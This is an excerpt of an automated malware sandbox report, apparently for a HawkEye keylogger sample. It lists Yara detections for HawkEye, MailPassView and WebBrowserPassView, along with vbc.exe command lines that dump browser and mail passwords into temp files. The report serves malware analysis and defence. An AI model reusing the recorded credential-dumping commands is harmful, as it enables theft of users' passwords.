                                                                                                  MD5 hash:EFEC8C379D165E3F33B536739AEE26A3
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                  Yara matches:
                                                                                                  • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000000C.00000002.613574939.0000000008110000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000C.00000002.602473757.0000000002B31000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000C.00000002.602473757.0000000002B31000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000000C.00000002.612974883.0000000007750000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000C.00000002.606739235.0000000003B31000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000C.00000002.606739235.0000000003B31000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 0%, Metadefender, Browse
                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                  Reputation:moderate

                                                                                                  Analysis Process: vbc.exe PID: 5560 Parent PID: 6456

                                                                                                  General

                                                                                                  Start time:11:13:49
                                                                                                  Start date:27/07/2021
                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                                                                                                  Imagebase:0x400000
                                                                                                  File size:1171592 bytes
                                                                                                  MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000012.00000002.493947169.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  Reputation:high

                                                                                                  Analysis Process: vbc.exe PID: 5432 Parent PID: 6456

                                                                                                  General

                                                                                                  Start time:11:13:49
                                                                                                  Start date:27/07/2021
                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                                                                                                  Imagebase:0x400000
                                                                                                  File size:1171592 bytes
                                                                                                  MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000013.00000002.491218277.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  Reputation:high

                                                                                                  Disassembly

                                                                                                  Code Analysis

                                                                                                  Reset < >